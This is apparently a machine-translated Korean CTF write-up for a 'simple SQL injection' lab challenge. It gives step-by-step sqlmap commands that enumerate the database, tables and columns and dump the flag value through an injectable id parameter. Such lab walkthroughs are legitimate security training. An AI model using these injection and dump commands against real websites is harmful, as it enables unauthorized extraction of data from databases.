ctf 문제 집 - 간단 한 sql 주입 ③

2298 단어 기타
mysql 오류 주입 형식: flag {} 문제 풀이 링크:http://ctf5.shiyanbar.com/web/index_3. phop 1. 제목 링크 를 열 고 조회 에 1 을 입력 하면 주소 표시 줄 이 변 하 는 것 을 발견 합 니 다.1 2. 여기 가 가능 하 다 고 생각 합 니 다.3. 도구 sqlmap 를 사용 하여 주입 합 니 다 (이 주소 표시 줄 id 값 을 예 로 들 면).
  • 현재 데이터베이스 보기:
    • Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db 1
  • 보기 (맞 추기) 표:
    • Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables ctf题库--简单的sql注入③_第1张图片
  • flag 표 의 열 보기
    • Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -columns ctf题库--简单的sql注入③_第2张图片
  • flag 표 의 flag 값 을 덤 프 합 니 다:
    • Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump
    최종 값 을 얻 을 수 있 습 니 다: ctf题库--简单的sql注入③_第3张图片
    후기: sqlmap 에 익숙 하지 않 으 면 자주 사용 하 는 주입 문 과 흔히 볼 수 있 는 주입 방법 을 가장 먼저 기억 하고 필요 할 때 도 수공 주입 을 고려 할 수 있 습 니 다.
    작품: 루비 체스
    WPF 그림을 순환적으로 불러와서 메모리가 넘치는 해결 방법

    좋은 웹페이지 즐겨찾기

    개발자 우수 사이트 수집

    개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다
    best100-homepage